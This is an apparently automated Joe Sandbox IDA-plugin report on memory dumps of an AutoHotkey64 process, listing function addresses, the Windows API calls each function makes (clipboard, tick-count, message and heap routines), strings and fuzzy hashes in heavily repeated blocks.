Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseFileGlobalMessageMovePeekUnlock
String ID:
API String ID: 1818255640-0
Opcode ID: 36605de429c19ab1063c162a19061c3cc2d2e7dfd0a9bb33a0a57ee6cf94b6ff
Instruction ID: 06b6476b19a7d5d85748d3c53d7dd32bffc6071675c16681dd0eccaac493d187
Opcode Fuzzy Hash: 36605de429c19ab1063c162a19061c3cc2d2e7dfd0a9bb33a0a57ee6cf94b6ff
Instruction Fuzzy Hash: 51A1C2B160464486FB628B27E4843E937A1F78DBE4F120226FB5967BF6DB38C481C745

Function 0000000140044ED9 Relevance: 10.7, APIs: 7, Instructions: 196windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
Beep.KERNEL32 ref: 0000000140044F30

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$BeepClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 3141429382-0
Opcode ID: 47de0d4a4a0128ec425792652d48512c6815e4816f7d087c2d7d75bdb8aaa5f9
Instruction ID: edd08f2428ca359657f060651c95d0372aafe9f08dbf599f56f4bb67f57f8772
Opcode Fuzzy Hash: 47de0d4a4a0128ec425792652d48512c6815e4816f7d087c2d7d75bdb8aaa5f9
Instruction Fuzzy Hash: 60A1A3B160464486F7668B27E4443E937A1F38DBE4F110226FB59A3BF6DB38C895C744

Function 0000000140045011 Relevance: 10.7, APIs: 7, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322
SHEmptyRecycleBinW.SHELL32 ref: 0000000140045029

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseEmptyGlobalMessagePeekRecycleUnlock
String ID:
API String ID: 2387848762-0
Opcode ID: dbdfc5606b270520d98a892302cdc91a4eaedcdc9507054747b18fa2c9146ab3
Instruction ID: 30c64947d778c5d068ab594412527c206cdedd3640a42357ce37d8a61bf0f46a
Opcode Fuzzy Hash: dbdfc5606b270520d98a892302cdc91a4eaedcdc9507054747b18fa2c9146ab3
Instruction Fuzzy Hash: FD91C4B160464486F7668B27E4843E937E1F38DBE4F11022AFB59A3AF5DB38C891C745

Function 00000001400285B0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 187comCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140028965
OleInitialize.OLE32 ref: 000000014002896D

Strings

No tray mem, xrefs: 000000014002881E
A_Clipboard, xrefs: 00000001400288F1, 000000014002891E
Tray, xrefs: 0000000140028800
Clipboard, xrefs: 0000000140028869, 0000000140028897

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Initialize$CriticalSection
String ID: A_Clipboard$Clipboard$No tray mem$Tray
API String ID: 49594357-66866361
Opcode ID: cd4126721d42bcd3b5535d588909754dc3df104d9cb3197246a89da5758059d4
Instruction ID: c2210a8bfebf6e968dc940362942495f847da2b2101f9e7a5d4d1ab9926136f7
Opcode Fuzzy Hash: cd4126721d42bcd3b5535d588909754dc3df104d9cb3197246a89da5758059d4
Instruction Fuzzy Hash: A7B1DDB5114B8085E7239B26FD403C5B6E8BB6DB90F64021EEB8963BF1DB78C561C744

Function 0000000140045167 Relevance: 10.7, APIs: 7, Instructions: 187windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140072120: GetFullPathNameW.KERNEL32(000000014008DEB7), ref: 000000014007214D
Part of subcall function 0000000140072120: GetFileAttributesW.KERNEL32 ref: 000000014007216F
Part of subcall function 0000000140072120: SetLastError.KERNEL32 ref: 0000000140072181

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322
GetLastError.KERNEL32 ref: 0000000140045179

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ErrorLast$AttributesClipboardCloseFileFullGlobalMessageNamePathPeekUnlock
String ID:
API String ID: 769837341-0
Opcode ID: ea8f3ec87e584193ddbe24061f9be85a86e6acbcb40e01d08e3ee23e4457f071
Instruction ID: dc4fc0ac3320c2a7f3004f5f17ed61323f6edb627a6a4ebe2c0f000154d4bf53
Opcode Fuzzy Hash: ea8f3ec87e584193ddbe24061f9be85a86e6acbcb40e01d08e3ee23e4457f071
Instruction Fuzzy Hash: CA91A1B160464486FB668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C494C745

Function 000000014004634B Relevance: 10.7, APIs: 7, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322
OutputDebugStringW.KERNEL32 ref: 000000014004636B

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseDebugGlobalMessageOutputPeekStringUnlock
String ID:
API String ID: 1875564215-0
Opcode ID: dd6cc0c7c21f49ff78b0013e370e6593fab5630ce07154e5d8aa93df22ab5d49
Instruction ID: 9e997916f704e8d7b560ac9a385f4fbb162633bb965cbb4697739c5c48b7c8ee
Opcode Fuzzy Hash: dd6cc0c7c21f49ff78b0013e370e6593fab5630ce07154e5d8aa93df22ab5d49
Instruction Fuzzy Hash: 0291B5B160064486FB668B27E4443E837A1F34DBE4F11022AFB5963AF6DB38C891C745

Function 000000014000279F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64threadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.02,?,00000001400C11F9), ref: 0000000140002A66
GetWindowThreadProcessId.USER32 ref: 0000000140002A7D
GetClassNameW.USER32 ref: 0000000140002A9F
IsDialogMessageW.USER32 ref: 0000000140002AE1
SetCurrentDirectoryW.KERNEL32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.02,?,00000001400C11F9), ref: 0000000140002B11

Strings

#32770, xrefs: 0000000140002AAC

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Window$ClassCurrentDialogDirectoryForegroundMessageNameProcessThread
String ID: #32770
API String ID: 2633243691-463685578
Opcode ID: c0a4873b356b57c2b3baf6a586a01412f1de85bd4f66fc12d96b33e14106a79e
Instruction ID: a250c3b3a1672cb0e10bf68ebfcc346c13ef5fd1ae730ae547beb393ef257849
Opcode Fuzzy Hash: c0a4873b356b57c2b3baf6a586a01412f1de85bd4f66fc12d96b33e14106a79e
Instruction Fuzzy Hash: 0D312AB120578981FB67DF16E8543E433A0B74DBD4F58002AEB0A172B5DB7CDA85C701

Function 00000001400D6F18 Relevance: 10.5, APIs: 7, Instructions: 47memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00000001400D6F48
HeapAlloc.KERNEL32(?,?,00000000,00000001400DECD8,?,?,00000000,00000001400DC3A5,?,?,?,00000001400DC44F,?,?,00000000,00000001400DB509), ref: 00000001400D6F6D
_callnewh.LIBCMT ref: 00000001400D6F86
_errno.LIBCMT ref: 00000001400D6F91
_errno.LIBCMT ref: 00000001400D6F9C
_callnewh.LIBCMT ref: 00000001400D6FAC
_errno.LIBCMT ref: 00000001400D6FB1

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: _errno$_callnewh$AllocHeap
String ID:
API String ID: 2989141601-0
Opcode ID: dcbd21e9241b52d9700a9cc95b7aee886b813a97aaa445b3f487fcc64a05c363
Instruction ID: 50cf1e2a7005abd32925f1b913850ee84db9a8bf21c0ed9231399aa7b44643db
Opcode Fuzzy Hash: dcbd21e9241b52d9700a9cc95b7aee886b813a97aaa445b3f487fcc64a05c363
Instruction Fuzzy Hash: 18117C30211A44C1FA56ABA3A4107ED26A19F8CBE0F484235BF59473F6DF78C8428731

Function 0000000140040110 Relevance: 9.3, APIs: 6, Instructions: 318windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c2eeec0aedd3c7b5d9b6eedda8178e12a98e2e03d14aaec89c1de6148968e21e
Instruction ID: 5e267c742099fc8e6499ed35e637022f2c8e92e0374b2a9109fa0e9e4dc849c0
Opcode Fuzzy Hash: c2eeec0aedd3c7b5d9b6eedda8178e12a98e2e03d14aaec89c1de6148968e21e
Instruction Fuzzy Hash: 4EF1AF72604B8489F762CF26E4447E837A1F78DBA4F160226EB5963BF5DB38C491CB05

Function 0000000140044C87 Relevance: 9.3, APIs: 6, Instructions: 278windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 45b735ee95e1cb0bd4c73b6d4873e158719fd7b0f238e51174717f9753731e1a
Instruction ID: 6e243e69deca9d08b5c25312528177e004834bb4b0843b63f3f261c582b623d7
Opcode Fuzzy Hash: 45b735ee95e1cb0bd4c73b6d4873e158719fd7b0f238e51174717f9753731e1a
Instruction Fuzzy Hash: 92D1C07160464486FB629B27D4843E977A2F78DBD4F124226FB0967BF6DB38C881C744

Function 0000000140045607 Relevance: 9.2, APIs: 6, Instructions: 242windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock
String ID:
API String ID: 1792675829-0
Opcode ID: 2adb0e16f773ae687c49e8118690c588104f98b85e729743a3fc3d133f1b7d14
Instruction ID: 72cca11892e3c9ef9988af418a244f0153366168070362191c4d2670bf31e03d
Opcode Fuzzy Hash: 2adb0e16f773ae687c49e8118690c588104f98b85e729743a3fc3d133f1b7d14
Instruction Fuzzy Hash: 47C18DB160468486F7629F27E4443E937A1F38DBD4F51022AEB5967BF6DB38C881C744

Function 0000000140044A32 Relevance: 9.2, APIs: 6, Instructions: 216windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e109b7e0a522b510a16e9c24d39937af89d2077917b8beb5f85d869a22cc46f8
Instruction ID: 30499ecf1bdd4ef3d2ce2fbccc4dc1eb37c48441ce0d3c871e161b1d54c55263
Opcode Fuzzy Hash: e109b7e0a522b510a16e9c24d39937af89d2077917b8beb5f85d869a22cc46f8
Instruction Fuzzy Hash: 2DB1B0B160464486FB629B27E4843E937A1F38CBE4F11012AFB5967BF6DB38C891C705

Function 0000000140043A22 Relevance: 9.2, APIs: 6, Instructions: 213windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140060A80: GetForegroundWindow.USER32 ref: 0000000140060BC9
Part of subcall function 0000000140060A80: IsIconic.USER32 ref: 0000000140060BDA
Part of subcall function 0000000140060A80: GetWindowRect.USER32 ref: 0000000140060BEF

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseForegroundGlobalIconicMessagePeekRectUnlock
String ID:
API String ID: 1613694844-0
Opcode ID: a46f6b4c9e11c9dcaaf72b09aff0519e99a38a122c49eca314d2434339f55c38
Instruction ID: 989b21918a15ed48f69d9778d0a729d2f2e3b3c9acac3f44d05a15fdd4b80571
Opcode Fuzzy Hash: a46f6b4c9e11c9dcaaf72b09aff0519e99a38a122c49eca314d2434339f55c38
Instruction Fuzzy Hash: E6A1A07160468486F7628B27E4843E937A1F38DBE4F110226FB59A7BF6DB38C491CB45

Function 0000000140040C39 Relevance: 9.2, APIs: 6, Instructions: 210windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c6c492c9e4ae6c111f131c25e0387d13a227979cdf792142cf2f06fc733806a9
Instruction ID: 106d506d118b48d3f42d8e3e24b4c2ee7bbee8a148c96a9bd8bb0971513f7185
Opcode Fuzzy Hash: c6c492c9e4ae6c111f131c25e0387d13a227979cdf792142cf2f06fc733806a9
Instruction Fuzzy Hash: 5CB18F72604B4486FB668B27E8843E937A1F38DBE4F110226EB5963BF5DB38C491C705

Function 00000001400406A6 Relevance: 9.2, APIs: 6, Instructions: 206windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
